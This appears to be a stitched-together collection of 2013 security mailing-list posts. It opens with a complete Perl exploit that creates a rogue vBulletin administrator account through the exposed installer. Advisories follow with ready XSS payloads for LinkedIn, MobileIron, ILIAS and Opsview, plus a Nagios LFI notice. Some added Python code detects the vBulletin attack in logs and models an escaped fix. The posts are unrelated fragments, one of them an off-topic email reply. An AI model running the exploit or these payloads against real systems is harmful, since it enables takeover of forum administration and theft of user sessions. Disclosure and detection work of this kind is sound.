# Rename or delete the install folder until a fix is released.
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use. Use at your own risk.
#
# Exploit usage:
#
# root@MorXploit:/home/simo/morx# perl morxvb.pl localhost
#
# ===
# --- vbulletin admin injection exploit
# --- By: Simo Ben youssef simo_at_morxploit_com
# --- MorXploit Research www.MorXploit.com
# ===
# [*] Trying to get customer number ... hold on!
# [+] Got <customer number>!
# [*] Trying to MorXploit localhost ... hold on!
# [+] Admin account successfully injected!
# [+] Admin: MorXploit
# [+] Pass: m0rxpl017

use strict;
use IO::Socket;

if (!defined($ARGV[0])) {
    system('clear');
    print "\n";
    print "===\n";
    print "--- vbulletin admin injection exploit\n";
    print "--- By: Simo Ben youssef simo_at_morxploit_com\n";
    print "--- MorXploit Research www.MorXploit.com\n";
    print "===\n";
    print "--- Usage: perl $0 <target>\n\n";
    exit;
}

my $site = $ARGV[0];

# Change these as needed #
my $user   = "MorXploit";
my $passwd = "m0rxpl017";
my $email  = "dev%40null.com";
my $path   = "/install/upgrade.php";
##

my $accept = "Accept: */*";
my $ct     = "application/x-www-form-urlencoded";
my $port   = 80;

system('clear');
print "\n";
print "===\n";
print "--- vbulletin admin injection exploit\n";
print "--- By: Simo Ben youssef simo_at_morxploit_com\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===\n";

# Step 1: fetch the upgrade page unauthenticated and scrape the customer number
# (CUSTNUMBER) that the script embeds in its own HTML.
my $sock = new IO::Socket::INET(PeerAddr => $site, PeerPort => $port, Proto => 'tcp');
die "\n[-] Can't create socket: $!\n" unless $sock;

print "[*] Trying to get customer number ... hold on!\n";
print $sock "GET $path HTTP/1.1\n";
print $sock "Host: $site\n";
print $sock "$accept\n";
print $sock "Content-Type: $ct\n";
print $sock "Connection: Close\n\n";

my $gotcn;
while (my $cn = <$sock>) {
    if ($cn =~ /CUSTNUMBER = \"(.*?)\"/) {
        $gotcn = $1;
    }
}

if (!defined $gotcn) {
    print "[-] Failed to get customer number! Nulled? Going to try anyway!\n";
} else {
    print "[+] Got $gotcn!\n";
}

# Step 2: replay the installer's "create administrator" step (step=7) with the
# scraped customer id and our own credentials.
my $xploit = "ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0&only=false"
           . "&customerid=$gotcn&options[skiptemplatemerge]=0&response=yes&htmlsubmit=1"
           . "&htmldata[username]=$user&htmldata[password]=$passwd"
           . "&htmldata[confirmpassword]=$passwd&htmldata[email]=$email";
my $cl      = length($xploit);
my $content = "Content-Length: $cl";

my $sock2 = new IO::Socket::INET(PeerAddr => $site, PeerPort => $port, Proto => 'tcp');
die "\n[-] Can't create socket: $!\n" unless $sock2;

print "[*] Trying to MorXploit $site ... hold on!\n";
print $sock2 "POST $path HTTP/1.1\n";
print $sock2 "Host: $site\n";
print $sock2 "$accept\n";
print $sock2 "Cookie: bbcustomerid=$gotcn\n";
print $sock2 "Content-Length: $cl\n";
print $sock2 "Content-Type: $ct\n";
print $sock2 "Connection: Close\n\n";
print $sock2 "$xploit\n\n";

while (my $result = <$sock2>) {
    if ($result =~ /Administrator account created/) {
        print "[+] Admin account successfully injected!\n";
        print "[+] Admin: $user\n";
        print "[+] Pass: $passwd\n";
        exit;
    }
}

print "[-] Failed, something went wrong\n";
exit;
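The exploit above leaves two things a defender can look for in web-server logs: the installer script still answering after setup (the advisory's fix is to rename or delete the install folder), and a GET to upgrade.php (the customer-number scrape) followed within seconds by a POST to the same script from the same address. The following is an added example, not the exploit author's code and not part of vBulletin: a Python check over a few constructed Apache combined-log lines. The log lines, addresses and the 60-second window are assumptions for the demonstration.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-log lines (not real traffic). 203.0.113.7 fetches the installer
# and immediately POSTs to it, the pattern of the exploit above; 198.51.100.4 probes but gets
# 404 (install directory removed); 192.0.2.9 POSTs blind and is refused.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Oct/2013:10:01:02 +0000] "GET /forum/install/upgrade.php HTTP/1.1" 200 18321 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Oct/2013:10:01:03 +0000] "POST /forum/install/upgrade.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [24/Oct/2013:10:05:00 +0000] "GET /forum/forumdisplay.php?f=2 HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
198.51.100.4 - - [24/Oct/2013:10:05:09 +0000] "GET /forum/install/upgrade.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
192.0.2.9 - - [24/Oct/2013:11:30:00 +0000] "POST /forum/install/upgrade.php HTTP/1.1" 403 199 "-" "curl/7.29"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Installer scripts vBulletin ships under /install/; the advisory's fix is to remove that folder.
INSTALLER_RE = re.compile(r"/install/(upgrade|install)\.php(\?|$)", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_installer_abuse(lines, window=timedelta(seconds=60)):
    """Return sorted (finding, ip) pairs: 'installer_reachable' when the install script
    answers 200 to anyone, 'admin_injection_pattern' when a GET (customer-number scrape)
    is followed by a POST from the same address within the window."""
    findings = set()
    last_get = {}
    for rec in filter(None, map(parse_line, lines)):
        if not INSTALLER_RE.search(rec["path"]):
            continue
        if rec["status"] == 200:
            findings.add(("installer_reachable", rec["ip"]))
        if rec["method"] == "GET":
            last_get[rec["ip"]] = rec["ts"]
        elif rec["method"] == "POST":
            seen = last_get.get(rec["ip"])
            if seen is not None and rec["ts"] - seen <= window:
                findings.add(("admin_injection_pattern", rec["ip"]))
    return sorted(findings)


if __name__ == "__main__":
    for kind, ip in find_installer_abuse(SAMPLE_LOG.splitlines()):
        print("%-24s %s" % (kind, ip))
```

Feed it a real access log with `find_installer_abuse(open(path))`; a single `installer_reachable` hit on a production forum is already actionable regardless of whether a POST followed, since the account-creation step needs no session.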
[ISecAuditors Security Advisories] XSS vulnerability in LinkedIn
= INTERNET SECURITY AUDITORS ALERT 2013-003 =
- Original release date: March 3rd, 2013
- Last revised: March 10th, 2013
- Discovered by: Vicente Aguilera Diaz
- Severity: 4.3/10 (CVSSv2 Base Score)

I. VULNERABILITY
XSS vulnerability in LinkedIn.

II. BACKGROUND
LinkedIn is a social networking service and website (www.linkedin.com) for professionals. The site officially launched on May 5, 2003. As of September 30, 2012 (the end of the third quarter), professionals were signing up to join LinkedIn at a rate of approximately two new members per second. Currently, over 200 million professionals use LinkedIn to exchange information, ideas and opportunities. More info: http://www.linkedin.com

III. DESCRIPTION
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

LinkedIn is vulnerable to XSS during a DWR (Direct Web Remoting, an open source Java library) call, through the c0-id parameter. There are several instances of this issue:
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreativeText.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getBidSuggestion.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateClickThroughUrl.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getCostAndMemberCount.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateRequiredFields.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateDisplayUrl.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getExampleAds.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.changeBizAcctName.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.updateAlertMessageId.dwr

IV. PROOF OF CONCEPT
Next, we show a typical request to the /ads/dwr/exec/SasAjax.validateCreative.dwr resource:

POST /ads/dwr/exec/SasAjax.validateCreative.dwr HTTP/1.1
Host: www.linkedin.com
...other-HTTP-headers...

callCount=1
JSESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9
c0-scriptName=SasAjax
c0-methodName=validateCreative
c0-id=5518_1360723319833
c0-param0=string:
c0-param1=string:
c0-param2=string:
c0-param3=string:
c0-param4=string:
c0-param5=string:
c0-param6=string:en_US
c0-param7=string:0
c0-param8=string:0
c0-param9=number:0
xml=true

Some parameters are not used or validated by the application, so they can be removed from the request. The only parameters the application requires are:
- callCount
- JSESSIONID: can have any value, but must match the JSESSIONID cookie
- c0-id: the vulnerable parameter (HTML/script code can be injected through it)
- xml: must be changed from true (the default value) to false to make the script injection possible

The request can also be sent with HTTP GET instead of the HTTP POST used above, which makes the XSS easier to exploit. For example, we can inject script code that shows an alert popup with the document.cookie value:

c0-id=5518_1360723319833');</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><!--

So, finally, this HTTP request triggers the XSS:

https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr?callCount=1&JSESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9&c0-id=5578_1362323397833');</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><!--&xml=false

V. BUSINESS IMPACT
A malicious user can access the information stored in other users' cookies, so the attacker can spoof their identity and access their accounts.

VI. SYSTEMS AFFECTED
http://www.linkedin.com

VII. SOLUTION
Pending.

VIII. REFERENCES
http://www.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

IX. CREDITS
This vulnerability has been discovered and reported by Vicente Aguilera Diaz, vaguilera (at) isecauditors (dot)
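The payload works because the c0-id value lands inside a single-quoted JavaScript string in the DWR reply, and with xml=false that reply is delivered as an HTML document the browser renders, so `');` ends the callback statement and the `</SCRIPT><SCRIPT>` that follows is parsed as markup. The following is an added example, not LinkedIn's or DWR's code: a Python model of the vulnerable reply beside a hardened one. The reply shape (`dwr.engine._remoteHandleCallback('batch','id',data)` wrapped in an HTML page for the iframe transport) is a simplified assumption, and the call-id allow-list regex is an assumption chosen for the example.

```python
import json
import re

# Constructed inputs, reproducing the advisory's c0-id payload offline (no request is sent).
GOOD_ID = "5518_1360723319833"
PAYLOAD = "5518_1360723319833');</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><!--"

# DWR call ids look like "<counter>_<millis>". This allow-list is an assumption for the
# hardened handler below, not a rule taken from DWR or LinkedIn.
CALL_ID_RE = re.compile(r"^[0-9]+_[0-9]+$")


def js_literal(value):
    """JSON-encode a value for embedding in a script block, escaping the characters that
    could terminate the <script> element or confuse the JS parser."""
    s = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        s = s.replace(ch, esc)
    return s


def dwr_callback_vulnerable(call_id, data):
    """Assumed, simplified DWR reply: the client-supplied id is pasted verbatim into a
    single-quoted JS string, so an id containing "');" ends the statement early."""
    return "dwr.engine._remoteHandleCallback('0','%s',%s);" % (call_id, json.dumps(data))


def dwr_callback_hardened(call_id, data):
    """Reject ids outside the expected format, then emit every value as an escaped literal."""
    if not CALL_ID_RE.match(call_id):
        raise ValueError("rejected call id: %r" % call_id)
    return "dwr.engine._remoteHandleCallback('0',%s,%s);" % (js_literal(call_id), js_literal(data))


def iframe_reply(callback_js):
    """With xml=false the reply goes to DWR's iframe transport: an HTML document the browser
    renders, so markup that escapes the script block is parsed as HTML (assumed shape)."""
    return ("<html><body><script type='text/javascript'>\n"
            + callback_js + "\n</script></body></html>")


def count_script_tags(html):
    """Opening <script ...> tags in the reply; anything beyond the one DWR writes is injected."""
    return len(re.findall(r"<script\b", html, flags=re.IGNORECASE))


if __name__ == "__main__":
    vuln = iframe_reply(dwr_callback_vulnerable(PAYLOAD, True))
    print(vuln)
    print("script tags in vulnerable reply:", count_script_tags(vuln))
    print(iframe_reply(dwr_callback_hardened(GOOD_ID, True)))
    try:
        dwr_callback_hardened(PAYLOAD, True)
    except ValueError as e:
        print("hardened handler:", e)
```

Both halves of the fix matter: the allow-list stops the id from carrying markup at all, and `js_literal` keeps any legitimately quoted value from ending the script block even when the id check is later relaxed.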
[scip_Advisory 10847] MobileIron 4.5.4 Device Registration regpin Cross Site Scripting
MobileIron 4.5.4 Device Registration regpin Cross Site Scripting
scip AG Vulnerability ID 10847 (10/28/2013)
http://www.scip.ch/en/?vuldb.10847

I. INTRODUCTION
MobileIron is a commercial solution to provide secure access to mobile users in corporate environments. More information is available on the official web site at the following URL:
http://www.mobileiron.com/

II. DESCRIPTION
Pascal Schaufelberger at scip AG found a cross site scripting vulnerability in the older release 4.5.4. An attacker is able to inject arbitrary script code without prior authentication.

III. SCORING
CVSSv2 Base Score: 7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSSv2 Temp Score: 5.9 (CVSS2#E:POC/RL:OF/RC:C)

IV. EXPLOITATION
The attack requires access to the device registration form. The attack can be initiated with the following URL:
https://www.example.com/mifs/c/i/reg/reg.html?regpin=12345;<script>alert('scip')</script>

V. IMPACT
This is a traditional reflected cross site scripting vulnerability, which allows the injection of arbitrary script code. An attacker might be able to alter the behavior of the web site and might therefore attack visitors.

VI. DETECTION
Cross site scripting patterns in the regpin field should be detected and eliminated. Most security solutions provide this function out of the box.

VII. SOLUTION
This issue was fixed in release 5.1.0 without further notification. The current release is 5.8, which has been available since October 2013.

VIII. VENDOR RESPONSE
The issue has been reported to the vendor via email. The communication was very efficient and friendly. After an exchange of technical details the vendor informed us that this issue was already known and had been patched without further notice.

IX. SOURCES
scip AG - Security is our Business
http://www.scip.ch
scip AG - Vulnerability Database
http://www.scip.ch/en/?vuldb.10847

X. DISCLOSURE TIMELINE
2013/09/28 Identification of the vulnerability
2013/10/14 First contact to MobileIron via Twitter
2013/10/15 Got mail address of MobileIron security contact
2013/10/16 Initial confirmation of our submission by MobileIron
2013/10/18 Detailed description of further actions by MobileIron
2013/10/18 Confirmation of next steps by scip AG
2013/10/28 Public disclosure of the advisory

XI. CREDITS
The vulnerability has been discovered by Pascal Schaufelberger.
Pascal Schaufelberger, scip AG, Zuerich, Switzerland
pasc-at-scip.ch
http://www.scip.ch

The disclosure process has been handled by Marc Ruef.
Marc Ruef, scip AG, Zuerich, Switzerland
maru-at-scip.ch
http://www.scip.ch

A1. LEGAL NOTICES
Copyright (c) 2002-2013 scip AG, Switzerland. Permission is granted for the re-distribution of this alert. It may not be edited in any way without permission of scip AG. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage from use of or reliance on this advisory.
[PT-2013-46] Local File Include in Nagios Looking Glass
---
(PT-2013-46) Positive Technologies Security Advisory
Local File Include in Nagios Looking Glass
---

---[ Vulnerable software ]
Nagios Looking Glass
Version: 1.1.0 beta 2 and earlier
Link: http://exchange.nagios.org/directory/Addons/Frontends-(GUIs-and-CLIs)/Web-Interfaces/Nagios-Looking-Glass/details

---[ Severity level ]
Severity level: High
Impact: File reading
Access Vector: Remote
CVSS v2:
Base Score: 7.8
Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N)
CVE: not assigned

---[ Software description ]
Nagios Looking Glass (NLG) is a web-based interface for Nagios that allows you to show at-a-glance, real-time server status to 3rd parties without giving them direct access to Nagios.

---[ Vulnerability description ]
The specialists of the Positive Research Center have detected a Local File Include vulnerability in Nagios Looking Glass. The application does not validate input data, which allows an attacker to read configuration files. Exploiting this vulnerability does not require any privileges in Nagios Looking Glass. The vulnerability exists in server/s3_download.php.

---[ How to fix ]
No solution

---[ Advisory status ]
19.07.2013 - Vendor received vulnerability details
13.08.2013 - Vulnerability details were sent to CERT
28.10.2013 - Public disclosure

---[ Credits ]
The vulnerability was detected by Vyacheslav Egoshin, Positive Research Center (Positive Technologies Company)

---[ References ]
http://en.securitylab.ru/lab/PT-2013-46
Reports on the vulnerabilities previously discovered by Positive Research:
http://www.ptsecurity.com/research/advisory/
http://en.securitylab.ru/lab/
Re: Call for Papers, 2014 Symposium on Protocols and Rules for Security (SPRS2014)
> Dear Colleagues,
>
> We would like to cordially invite you to submit or recommend papers to 2014 Symposium on Protocols and Rules for Security (SPRS2014)!

May I suggest rule 1. Don't send HTML-only email, to enable rule 2. Don't render HTML email unless you're sure it's what it claims to be and you are sure it is safe. Actually, just don't; you know someone in your organisation will get phished, putting others at risk. Just strip the HTML at your MTA; you can do this because of rule 1.

regards
brandon
ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability

Document Title:
===
ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability

References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1122

Release Date:
=
2013-10-27

Vulnerability Laboratory ID (VL-ID):
1122

Common Vulnerability Scoring System:
3.9

Product & Service Introduction:
===
ILIAS is a web based learning management system (LMS, VLE). Features: Courses, SCORM 1.2 and 2004, mail, forum, chat, groups, podcast, file sharing, authoring, CMS, test, wiki, personal desktop, LOM, LDAP, role based access.
(Copy of the Homepage: http://sourceforge.net/projects/ilias/ )

Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the ILIAS eLearning v4.3.4 & v4.4 CMS web-application.

Vulnerability Disclosure Timeline:
==
2013-10-27: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=
Published

Affected Product(s):
ILIAS
Product: ILIAS eLearning - Content Management System 4.3.4 & 4.4

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Technical Details & Description:
A persistent input validation web vulnerability has been detected in the ILIAS eLearning v4.3.4 & v4.4 CMS web-application. The bug allows a remote attacker to inject their own persistent script code (application side). The persistent web vulnerability is located in the Notes & Comments module. Remote attackers are able to inject malicious script code via a POST request in the vulnerable comment or note parameters. Execution occurs in the comments and private notes modules of the admin panel. Exploitation of the persistent web vulnerability requires low user interaction and a low privileged web-application user account. Successful exploitation can lead to persistent session hijacking (customers), account theft via persistent web attacks, persistent phishing or persistent module context manipulation.
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Notes
[+] Comments

Vulnerable Parameter(s):
[+] note

Affected Module(s):
[+] Private Notes
[+] Comments Review

Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote attackers with low user interaction and a low privileged web-application user account. For demonstration or to reproduce ...

PoC: Public Comments & Private Notes

<div class="ilNote"><a name="note_35"><!-- <img src="./templates/default/images/note_unlabeled.png" alt="Note" title="Note" border="0" style="vertical-align:text-bottom; margin-bottom:2px;"/> --></a><span class="small light">Last edited on 26. Oct 2013</span><div class="ilNoteText"><h4 class="ilNoteTitle"></h4>%20%20[PERSISTENT INJECTED SCRIPT CODE!]</div></div>

--- PoC Session Logs ---
Status: 302[Found]
POST http://ilias.localhost:8080/ilias.php?note_type=1&cmd=post&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI&fallbackCmd=getNotesHTML&rtoken=2d302c4c574f61fc880f393433703e1b
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[20] Mime Type[text/html]
Request Headers:
Host[ilias.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://ilias.localhost:8080/ilias.php?note_type=1&note_id=35&cmd=editNoteForm&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI]
Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie; authchallenge=459071aa3327de70506cb2a465507bf5]
Connection[keep-alive]
Post Data:
note[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvulnerability-lab.com%2F%3E%40gmail.com%0D%0A%3E%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cdiv+style%3D%221%40gmail.com%0D%0A%3E%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%40gmail.com]
cmd%5BupdateNote%5D[Update+Note]
note_id[35]
Response Headers:
Date[Sat, 26 Oct 2013 21:12:44 GMT]
Server[Apache/2.2.22 (Ubuntu)]
X-Powered-By[PHP/5.3.10-1ubuntu3.8]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[http://ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]
CVE-2013-5695 Multiple Cross Site Scripting (XSS) Attacks in Opsview

CVE-2013-5695 Multiple Cross Site Scripting (XSS) Attacks in Opsview
Version(s): Opsview prior to 4.4.1
Author: J. Oquendo (joquendo at e-fensive dot net)

I. ADVISORY
Title: Multiple Cross Site Scripting (XSS) Attacks in Opsview
Date published: 2013-10-28
Vendor contacted: 2013-09-04

II. BACKGROUND
Opsview is a systems management product built on open source software. To minimize noise, read more about it here: http://www.opsview.com/about-us

III. DESCRIPTION
Opsview is vulnerable to several XSS attacks at the following locations:
/admin/auditlog
/info/host/
/login
/status/service/recheck
/viewport/
There are a variety of parameters within those functions which may allow a malicious user to trigger a cross site scripting attack.

IV. EXAMPLES

GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT HERE%3e HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

POST /login HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

app=OPSVIEW&back=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&login=Sign+in&login_password=no&login_username=no

POST /status/service/recheck HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&host_selection=opsview&service_selection=opsview%3bConnectivity%20-%20LAN&submit=Submit

GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

V. SOLUTION
Opsview released a fix in Opsview 4.4.1:
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes

--
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM
"Where ignorance is our master, there is no possibility of real peace" - Dalai Lama
42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF